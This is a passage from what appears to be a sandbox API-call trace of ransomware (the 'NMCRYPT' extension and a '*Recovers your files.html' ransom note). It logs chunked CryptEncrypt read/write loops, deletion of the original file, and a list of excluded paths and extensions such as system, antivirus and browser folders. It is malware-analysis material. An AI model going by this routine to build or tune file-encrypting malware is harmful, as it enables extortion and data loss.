lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.363] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.364] GetLastError () returned 0x0 [0151.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.364] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.364] GetLastError () returned 0x0 [0151.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.364] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.364] GetLastError () returned 0x0 [0151.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.364] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.364] GetLastError () returned 0x0 [0151.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.364] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.364] GetLastError () returned 0x0 [0151.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.364] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.364] GetLastError () returned 0x0 [0151.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.364] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.364] GetLastError () returned 0x0 [0151.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.365] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.365] GetLastError () returned 0x0 [0151.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.365] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.365] GetLastError () returned 0x0 [0151.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.365] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.365] GetLastError () returned 0x0 [0151.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.365] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.365] GetLastError () returned 0x0 [0151.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.365] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.365] GetLastError () returned 0x0 [0151.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.365] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.365] GetLastError () returned 0x0 [0151.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.366] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.366] GetLastError () returned 0x0 [0151.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.366] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.366] GetLastError () returned 0x0 [0151.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.366] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.366] GetLastError () returned 0x0 [0151.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.366] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.366] GetLastError () returned 0x0 [0151.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.366] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0151.366] GetLastError () returned 0x0 [0151.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0151.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0151.366] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0151.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui")) returned 0x20 [0151.367] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui", dwFileAttributes=0x20) returned 0 [0151.367] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned 1 [0151.367] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui")) returned 0 [0151.367] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" [0151.367] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0151.367] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC251.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc251.tmp")) returned 0xc251 [0151.368] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC251.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc251.tmp"), dwFlags=0x1) returned 0 [0151.368] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC251.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc251.tmp")) returned 1 [0151.368] CryptDestroyKey (hKey=0x9ad878) returned 1 [0151.368] wcslen (_String="OK") returned 0x2 [0151.368] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.368] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.368] CryptDestroyKey (hKey=0x9ad838) returned 1 [0151.368] CryptDestroyHash (hHash=0x9ad478) returned 1 [0151.368] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0151.368] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0151.368] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*NMCRYPT") returned 0 [0151.368] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*Recovers your files.html") returned 0 [0151.368] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*.exe") returned 0 [0151.368] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*.dll") returned 0 [0151.368] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*.lnk") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*.bat") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*.ini") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*.msi") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*.scf") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*pagefile.sys*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*NTUSER.DAT*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*AppData*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\winrar\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\java\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\windows\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\ESET\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\AVG\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\AVIRA\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*Atheros*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*Realtek*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*bootmgr*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*boot*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*boot*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*CONFIG.SYS*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*IO.SYS*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*MSDOS.SYS*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*NTDETECT.COM*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*ntldr*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*chrome*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*opera*") returned 0 [0151.369] PathMatchSpecW (pszFile="InputPersonalization.exe.mui", pszSpec="*firefox*") returned 0 [0151.369] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui", pszSpec="*") returned 1 [0151.369] strlen (_Str="NMoreira") returned 0x8 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 